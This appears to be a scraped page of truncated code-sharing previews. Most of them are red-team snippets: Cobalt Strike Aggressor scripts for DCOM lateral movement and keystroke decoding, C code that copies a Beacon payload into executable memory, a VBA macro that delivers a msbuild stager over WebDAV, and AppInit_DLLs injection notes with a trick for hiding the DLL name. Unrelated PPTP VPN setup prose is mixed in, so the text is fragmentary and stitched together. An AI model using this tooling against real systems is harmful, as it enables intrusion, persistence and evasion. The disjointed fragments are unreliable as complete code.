| # getexplorerpid($bid, &callback); | |
| sub getanypid { | |
| bps($1, lambda({ | |
| local('$pid $name $entry'); | |
| foreach $entry (split("\n", $2)) { | |
| ($name, $pid) = split("\\s+", $entry); | |
| if ($name eq $proc) { | |
| # $1 is our Beacon ID, $pid is the PID of $proc | |
| [$callback: $1, $proc, $pid]; | |
| } |
| # Lateral movement techniques based on research by enigma0x3 (Matt Nelson) | |
| # https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ | |
| # https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ | |
| # Beacon implementation based on comexec.cna by Raphael Mudge | |
| # https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2 | |
| # Register alias | |
| beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)", | |
| "Usage: dcom_shellexecute [target] [listener]\n\n" . | |
| "Spawn new Beacon on a target via DCOM ShellExecute Object."); |
| # convert comma separated keystroke values into a string. | |
| sub toString { | |
| local('@temp'); | |
| @temp = split(",", $1); | |
| shift(@temp); | |
| return join("", map({ | |
| return chr(parseNumber($1, 16, 10)); | |
| }, @temp)); | |
| } |
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //Add For PowerShell Invocation | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; |
| #include "stdafx.h" | |
| // Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread | |
| void spawnBeacon(char *payload, DWORD len) { | |
| HANDLE threadHandle; | |
| DWORD threadId = 0; | |
| char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
| memcpy(alloc, payload, len); |
| using System; | |
| using System.Collections.Generic; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Management; | |
| namespace ComAbandonment | |
| { | |
| public class ComAbandonment | |
| { |
Ubuntu 14.04.Secure Group Inbound Rules, add a SSH Rule(TCP, Port 22, 0.0.0.0/0) and a Custom TCP Rule(TCP, Port 1723, 0.0.0.0/0).sudo apt-get install pptpd.sudo vim /etc/pptpd.conf. Uncomment localip 192.168.0.1 and remoteip 192.168.0.234-238,192.168.0.245.sudo vim /etc/ppp/pptpd-options. Uncomment ms-dns and ms-wins. Change the IP to Google's DNS like this:
| /* | |
| * CredentialUI.cs - Windows Credential UI Helper | |
| * | |
| * License: Public Domain | |
| * | |
| */ | |
| using System; | |
| using System.ComponentModel; | |
| using System.Runtime.InteropServices; | |
| using System.Security; |
| ' | |
| ' Example of DBC2 msbuild.xml stager delivery through a webdav maping | |
| ' The stager file (msbuild.xml) can be generated from the DBC2 controller | |
| ' | |
| ' NOTE: | |
| ' msbuild.exe is supposed to accept a path straight from a webdav server (ex: msbuild.exe \\webdav_server\msbuild.xml) | |
| ' but it fails miserably for me, so I have to have to first map the drive... | |
| Sub Go() | |
| Dim cmd As String, srv As String |
| // Compile with: cl.exe appinitdllinjection.c /LD /o appinitdllinjection.dll | |
| // | |
| // This DLL can only be injected in a x64 process | |
| // | |
| // Set the registry to automatically load this DLL into 'any' process that is started (at least the ones relying on User32.dll) | |
| // by using the AppInit_DLLs capability: | |
| // | |
| // HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs = 'path_to_the_dll' (comma or space separated if required) | |
| // One trick with this registry entry is to separate DLLs with an hex '00' (by editing the value in binary) to hide the DLL name | |
| // |